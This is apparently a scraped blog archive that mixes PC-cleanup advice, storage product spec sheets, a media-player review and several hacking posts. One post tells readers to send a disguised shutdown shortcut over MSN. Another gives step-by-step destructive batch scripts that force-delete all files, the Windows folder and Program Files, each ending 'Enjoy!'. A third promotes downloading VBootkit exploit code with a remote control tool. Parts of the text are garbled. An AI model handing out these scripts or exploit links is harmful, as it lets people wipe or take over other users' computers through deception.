Showing posts with label Hard Disk. Show all posts
Showing posts with label Hard Disk. Show all posts

Wednesday, July 13, 2011

How to remove new folder.exe virus from pendrive

If you are using pen drive for data transfer at school, college or at your office you must have come across this virus. This virus creates an exe file in your USB drive with the name New Folder.exe. Here are some symptoms of thremove new folder.exe virusis virus.

  • Task manager is disabled.
  • Registry Editor is disabled.
  • Folder options not working.
  • Taking too much time for accessing pen drive.
  • Uses half of your computers processing power.

You can easily remove this virus from your computer by using Smart Virus Remover tool. It is a small 550 Kb file. Just download the file from the link given at the end of this article. Run this downloaded exe by double clicking on it. Then click on “Delete Autorun.inf file”.

After that click on” Remove virus from USB”. The virus will be removed from your pen drive. To restore your task manager, registry editor and other things which were disabled by virus – click on “Restore Default Windows Settings”.

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Monday, April 25, 2011

How to clean up the junk on your PC

MUNICH: It's a familiar problem for anyone with an older computer: a PC may run lightning-fast and smooth when it's new, but over time it starts coughing up unusual error messages and unidentifiable icons appear on the taskbar.

If the computer also starts getting slower at the same time as well, then it's time for a spring cleaning.

'When any computer is used under normal circumstances, a certain volume of garbage data is automatically produced,' says Harald Goerl, a professor for operating systems and computer architecture at the Bundeswehr University in Munich, Germany. Goerl nevertheless sees no need for routine clean-ups. 'You only need to do this if you can really feel that the speed has been impaired,' he says.

The primary culprit for PC slowdowns is software that is installed and then removed again. That's because many programs actually leave behind digital traces after uninstallation. The most common collection spot where junk data collects is the Windows Registry file. It's a database of information about all installed applications.
Many programs 'forget' to delete their entry in the registry when being removed. That continues expanding the database, which means the computer has to search longer to find a specific entry. 'You can compare it with a telephone book,' Goerl says. 'The thicker it is, the longer it takes to browse through.'

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You can get help in cleaning up those clogged registry files with free programs such as CCleaner, Wise Cleaner, and Advanced System Care. They search through the registry automatically looking for unnecessary entries, washing away the junk.

Linux and Apple users are actually no better off in this respect, Goerl says. 'Deleted programs leave traces behind in Linux and Mac OS, too. Because there's no central registry, though, cleaning up can actually be more difficult in some cases,' he says.

Programs that are not properly removed under Windows can create other problems as well. 'When some programs are being uninstalled, they also delete libraries still needed for other programs,' explains Joachim Geiler, dean of academic affairs at the IT working group at the Mittweida University of Applied Sciences in Germany.

Libraries are files with information that multiple programs need to be able to access. If they are deleted by accident, then applications may stop functioning, either partially or completely. This problem can generally be fixed by reinstalling the affected program.

Reinstalling the operating system is generally only needed in exception cases, says Goerl. 'Only in cases involving serious security problems should you have to reinstall the OS,' he says. 'If numerous files have been infected with tough-to-remove viruses, then reinstalling the operating system is probably the only remedy.'

The best recommendation for boosting speed that you suspect has been degraded as a result of application detritus: clean up your hard drive. 'At least 10 per cent of a hard drive's capacity should always be free,' says Joachim Geiler.

Otherwise files have to be split up across multiple sectors of traditional hard drives, and this results in data that is scattered in fragments throughout the hard drive, leading to slower access. The Windows defragmentation utility is needed to bring the files back to a contiguous state.

If you don't push your hard drive to its capacity all the time, then defragmentation need only be a seldom-used tool. 'Routine defragmentation used to be a common thing. Modern file systems like FAT32 create the files intelligently from the start, meaning users don't typically have to get involved,' says Geiler. The exception is for users who frequently work with especially large files, such as those used for video editing.

A clean hard drive is important beyond just the speed of the computer. It also makes work more relaxing. 'It's all about being able to find important files fast when you need them,' explains Joerg Schieb, who authored a book on keeping computers clean and running fast. For this reason he recommends routine cleanups every three months or so.

There are programs to help clean up, too. 'Lay users in particular may be better served by those programs,' Schieb says. Applications like TuneUp Utilities, Twin 7 2.0 from Data Becker, or PC Check & Tuning 2011 from Magix cost between 30 and 40 dollars and offer a number of cleanup options.

Saturday, September 5, 2009

WD Share Space Network Storage System

This high-speed network-attached storage system with capacities up to 8 TB and a space-saving footprint gives you all the benefits of a big time data center without the need for a big time IT department. Perfect for centralizing and sharing data and multimedia files on a small office or home network.

Key Features

Big capacity, small footprint - Offered in 2, 4 and 8 TB capacities, this small-footprint four-bay system takes up very little space and provides plenty of storage to go around.

RAID capability - Offers multiple RAID configurations for data protection and speed -- RAID 0 (Striped), RAID 1 (Mirrored) and RAID 5. The RAID 5 mode, only available on the fully-populated 4-drive system, is the recommended mode to achieve both high-performance and data protection through redundancy.

The 4 and 8 TB WD ShareSpace systems are shipped in RAID 5 mode for maximum reliability.

The 2 TB WD ShareSpace system is shipped in Spanning Mode for maximum capacity and the flexibility to add additional drives without reformatting the system.

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High-speed access, Ethernet connectivity - Provides data transfer rates up to 1000 Mbit/s when used in a GigE network.

Gigabit networking and transfer rates are five to six times faster than other network storage systems. This performance is comparable to USB 2.0 direct-attached storage.

Easy setup and discovery - An intuitive set-up wizard and easy-to-use discovery tool makes installation a snap.

E-mail alert system - Monitors drive and system health and sends you an e-mail if a problem is detected.

Stream digital media anywhere in your home - Built-in media server for streaming music, photos and movies to any DLNA certified multimedia device such as Playstation® 3, Xbox 360®, wireless digital picture frames, and connected audio receivers. DLNA 1.5 & UPnP certified.

iTunes® server support - Centralize your music collection and stream to a Mac® or Windows® PC using iTunes software.

Build your collection - Centralize digital media from all your computers into one vast media library. Now anyone can enjoy your collection from anywhere in your home.

Microsoft Active Directory support - Will join an Active Directory domain to utilize AD users and groups.

Push-button transfer - Plug a USB drive into the front-mounted USB 2.0 port and push a button to automatically transfer all the data on the drive to the WD ShareSpace system.

Automatic network backup software - Set up continuous backup for the computers* in your network using the included automatic backup software. Select the files you want to back up, then set it and forget it; every time you save a change it's automatically backed up. *3 software licenses included.

Remote access software - Access your files anywhere, anytime using MioNet remote access services from WD.

Download manager - Supports scheduled download through FTP and HTTP. Simultaneously manage multiple download tasks.

Windows Vista™ certified - Works seamlessly with Windows Vista to provide easy setup and automatic discovery.

Built-in FTP server - Set up your own FTP server. Manage the access authority and share your files with your friends or customers easily.

Three USB 2.0 ports - Two USB ports on the back to connect additional USB hard drives for backup or additional network storage. One USB port on the front for push button transfer.

Cooler, quieter, eco-friendlier -
Equipped with WD drives using WD GreenPower Technology, this system, with its efficient cooling architecture, and power saving mode, consumes up to 33% less power**, is reliably cool, and remarkably quiet.
** Tests based on comparison between a 1 TB dual-drive system using 7200 RPM drives and a 1 TB dual-drive system using WD’s GreenPower drives.

Power failure protection - Connect this system to your Universal Power Supply (UPS). If a power failure occurs, the system will shut down gracefully, protecting you from data loss.

Easy maintenance - Add or swap out drives quickly and easily.

Network storage manager - Manage your system configuration, create user IDs, passwords, security permissions, and quotas.

Ideal For

For small workgroups of 5 to 10 this system offers compact, centralized storage, accessible from anywhere.

Compatibility

  • Windows® Vista/XP/2000
  • Mac OS X 10.4.11+, 10.5.2+

Compatibility may vary depending on user’s hardware configuration and operating system.

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Package Contents

  • Network storage system with RAID (populated with 2 or 4 hard drives)
  • Ethernet cable
  • 2 hard drive mounting rails (for 2-drive models)
  • AC adapter
  • Software CD
  • Quick Install Guide

Performance Specifications

Serial Transfer Rate


USB 2.0


Serial Bus Transfer Rate (USB 2.0)                 480 Mb/s (Max)

Transfer Rates


Ethernet                                         10/100/1000 Mb/s capable

Physical Specifications


Capacity                                                                      4 TB


Interface                                                               Ethernet

Physical Dimensions

English

Height                                                               7.73 Inches


Length                                                              7.84 Inches

Width                                                                6.30 Inches

Weight                                                           10.78 Pounds

Metric

Height                                                                 196.2 mm

Length                                                                199.2 mm

Width                                                                  160.1 mm
Weight                                                                      4.9 kg

Environmental Specifications

Temperature (English)


Operating                                                         41° F to 95° F

Non-operating                                                 -4° F to 149° F

Temperature (Metric)

Operating                                                        5° C to 35° C

Non-operating                                              -20° C to 65° C

Electrical Specifications

Current Requirements


Power Dissipation

AC Input Voltage                                            100-240 VAC

AC Input Frequency                                              47-63 Hz

As used for storage capacity, one megabyte (MB) = one million bytes, one gigabyte (GB) = one billion bytes, and one terabyte (TB) = one trillion bytes. Total accessible capacity varies depending on operating environment. As used for buffer or cache, one megabyte (MB) = 1,048,576 bytes. As used for transfer rate or interface, megabyte per second (MB/s) = one million bytes per second, megabit per second (Mb/s) = one million bits per second, and gigabit per second (Gb/s) = one billion bits per second.

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Friday, July 10, 2009

Hash Downloader 1.0.0

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Hash Downloader - Hash Downloader is a very advanced Download Manager  developed to enhance the way people download files from the Internet giving them the best of the speed and personalization options along with the enhanced security features. It can increase the speed of the download up to 5 times. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages.

Some of the Important Features have been described Below :-

1. Option to Download parts of the ZIP file ( not available in many of the Download managers, thus reducing time and increasing the downloading speed.

2. Hash Downloader will resume unfinished download from the place where they left off. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost or dropped connections, network problems, computer shutdowns, or unexpected power outages.

3. A very Simple and easy to use Interface makes Hash Downloader user friendly and easy to use. Hash Downloader Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads.

4. Unlike other download managers and accelerators Hash Downloader segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance. It automatically segments the remaining part of downloaded file to improve the speed of downloading file.

5. It supports Proxy Servers, http, https and the ftp protocols. It also facilitates data to to be downloaded from a secured server using the login and password.

6. It also supports alternate URL concept. You can provide two or more locations to download a particular file and it automatically manages the best and the fastest possible way to download the file.

List of Changes:
Version 1.0.0 from 2009-04-20

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Source: http://hash-downloader.hash-worldwide-technology.qarchive.org/

Thursday, July 9, 2009

How to make a fake virus

This Cannot Damage your computer it only shuts it down

Step 1: Right click on your desktop.

Step 2: Click create new shortcut.

Step 3: Copy and paste the following: shutdown -s -t 02 -c "BYE!"

Step 4: Rename it as Application

Step 5: Right Click on your Desktop

Step 6: Click on New Compressed Zipped Folder

Step 7: Rename the compressed zipped folder to "stuff"

Step 8: Drag and Drop the the Application folder you created into the compressed zipped folder.

Step 9: Send it over msn

Step 10: Enjoy!

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Source:- http://www.stuffyouneedtoknow.page.tl/How-to-make-a-fake-virus.htm

How to make a virus

How to make a powerfull virus on Notepad.


This information is for educational purposes only don't be a jerk and try this out I will not be held responsible if any damage occurs to anything.

Step 1: Go to Start
Step 2: Type in Notepad
Step 3: Copy and Paste the following into notepad: DEL /F /Q *

Step 4: Save this as: "Virus.cmd" (with out quotation marks you must have .cmd)
Step 5: Don't open it. It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.

Step 6: Enjoy!

How to make a Virus that deletes the WINDOWS file

Step 1: Go to Start
Step 2: Type in Notepad. Hit enter
Step 3: Copy and paste the following: erase C:WINDOWS
Step 4: Save as: Cancel.cmd (you must have the .cmd)
Step 5: Don't Open it. It will DELETE your windows and then you have to reinstall it.
Step 6: Enjoy!

Another way...

Step 1: Open up notepad
Step 2: Copy and paste the following:
@echo off
del C:/Program Files
del C:/Documents and Settings
del C:/WINDOWS
echo Windows has Comitted Suicide
pause

Step 3: Save it as: Anything.cmd

Another way...

Step 1: Open up Notepad
Step 2: Copy and paste the Following:
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Step 3: Save it as: whateveryouwant.cmd

 

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Source:- http://www.stuffyouneedtoknow.page.tl/How-to-make-a-virus.htm

Monday, May 11, 2009

Windows 7 Hack Tool Goes Open-Source, Now Available For Download

Windows 7 HackingFew days ago I posted the most easiest way to hack into any computer running Windows 7, Vista, XP, Gentoo, Debian, Ubuntu and Fedora bypassing the login completely, the hack allowed users to bypass the login and access operating-system with root or administrator privileges, Now, two Indian security researchers Vipin Kumar and Nitin Kumar have publicly released their Windows 7 exploit code VBootkit 2.0 as open-source under GPL license allowing hackers to exploit Windows 7 kernel undetected without modifying any files on the disk, the whole process takes place in memory exploiting trusted kernel files with hacker's code allowing them to gain control of the user computer without getting detected.

Using VBootkit To Hack Windows 7

The demonstration download includes fully compiled binary files and source-code with the remote command controlling utility which can be used to send commands to exploited Windows 7 computer.

Download Vootkit 2.0 With Source-Code [3.4 MB] >>

           

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Source :-  http://www.megaleecher.net/Hacking_Windows_7

Wednesday, April 29, 2009

Modix HD3510: Fully Adequate DVD Player Replacement

At first glance, the white box of the Modix player looks like a normal external hard drive case. On the front is a large display and lots of function buttons, while the A/V and USB ports can be found on the back, where you can also attach an external power supply. Once you turn on the device, a menu structure will appear on the hard-to-read display. You can navigate either with the remote control or using the many buttons on the front.

Package information , Package Contents

 

The player can be controlled without a remote control, using the buttons

The remote control is pleasant to hold

Some buttons on the remote control have no functions

Source:- http://www.tomshardware.com/reviews/hard-disk-drive-video-players-hit-mainstream,1107-10.html

Codec Compatibility

Test format / Codec THEbox

AC-3

yes

3ivx D4

no

Canopus Soft DVSD

no

DAT CD-Video

yes

DivX 3.11

yes

DivX 3.20

yes

DivX 4.1

yes

DivX 5.03

yes

DivX 5.2

yes

DivX 6 (.divx)

yes

DivX 6 (.avi)

yes

DivX 6 with menus

yes **

DivX 2-PASS

yes

DVD Video (.vob)

yes

DVD with menus

no

Leadtools 1.0

no

Matroska

no

Morgan M-JPEG 3.0

no

Motion JPEG

yes

MP3 Fraunhofer

yes

MP3 Lame

yes

MP3 VBR

yes

MP3 CBR

yes

MPEG-1

yes

MPEG-2

yes

MS Media Player 9

no

MS MPEG4 V1

no

MS MPEG4 V2

yes

MS MPEG4 V3

yes

On2 VP3 V3.2

No

OGG

no

PCM Audio

yes

Sigma Realmagic

yes

SVCD (MPEG-2)

yes

VOB (MPEG-2)

yes

VCD (MPEG-1)

yes

WMA

yes

XviD MPEG3 V2.1

yes

XviD + AC3

yes

* video hangs, ** no DivX menu

 
 
Summary And Evaluation
 

THEbox HP-25OTG

 
Weighting Factor Score
20% Features

80%

40%

Ergonomics 65%
5% Price 85%
10% Design

95%

25% Service 50%
  Overall score 68%
 
Thanks to its versatility, the HP-25OTG is an ideal travel companion that can play back virtually any audio and video format. The tiny unit only reaches its limits when it comes to playing back DVD directories.
 
Source:- http://www.tomshardware.com/reviews/hard-disk-drive-video-players-hit-mainstream,1107-9.html

Player Setup: Not Much Of Use Here

Lots of setup options? Don't be fooled by its looks.

While the player's preference list contains all the absolutely critical functions, it dispenses completely with any instructions or explanations. Users are left scratching their heads over mysterious acronyms and jargon in both English and Chinese. The manual also lacks clear answers regarding what kinds of effects a modification might produce.

Selecting the TV standard

Two language versions are available

The on-screen text can be deactivated

Resetting the screen

File sorting

(De-)activating the screensaver

Source:- http://www.tomshardware.com/reviews/hard-disk-drive-video-players-hit-mainstream,1107-8.html

Setup Menu: Audio And Video

Not needed, since the remote has buttons that do the same things

Setup Menu: Slideshow

Image display settings

 

Source:- http://www.tomshardware.com/reviews/hard-disk-drive-video-players-hit-mainstream,1107-7.html

Not Many Setting Options Either

The main menu on the setup page

To get to the setup menu you have to push a button on the remote control. You'll search in vain for many menu options to configure, though. The menus are superfluously large, making it seem as if you have a lot of options to set, but you really don't.

Setup Menus: Photo Settings

Slideshow setting options

Source:- http://www.tomshardware.com/reviews/hard-disk-drive-video-players-hit-mainstream,1107-6.html

Spartan User Menu

The main menu is frugal and dispenses with all manner of frills

The player can be unpacked and hooked up in a jiffy. Besides plugging in the small power supply, all you have to do is connect the box to a TV. The unit only functions without the PSU when it's plugged into a USB port on a computer, where it functions just as an external file storage device. The HP-25OTG likewise requires an electrical socket somewhere within a cable's reach of the power supply to work on the road.

A piece of protective plastic inside the remote prevents the battery from running down before purchase, and is easy to remove. Once you've done so, the remote control is good to go. The LED starts blinking when you turn the power switch on; the unit boots within seconds, and then a very lean main menu appears on the screen. Its four buttons take you to the respective submenus. Note that with this player, "File" describes a kind of directory structure in which you can navigate to directly select the individual files you want.

Nine images are viewable in the preview

Long names are a good thing for MP3 files

The sound equalizer during MP3 playback

Located video files are played back in a preview window under the file menu

Minimalist display for video and audio files

Source:- http://www.tomshardware.com/reviews/hard-disk-drive-video-players-hit-mainstream,1107-5.html

Here's How The Multimedia Player Looks Inside

The actual hardware is mounted inside the unit with four tiny screws. A small board is visible containing the 2.5" hard drive; all other components, including the decoder chip and flash memory, are located next to the drive. The back of the board is nearly devoid of components, as the player doesn't need much hardware for its decoding work.

Compact board with pre-mounted 2.5" drive

The back of the player board

Source:- http://www.tomshardware.com/reviews/hard-disk-drive-video-players-hit-mainstream,1107-4.html

 
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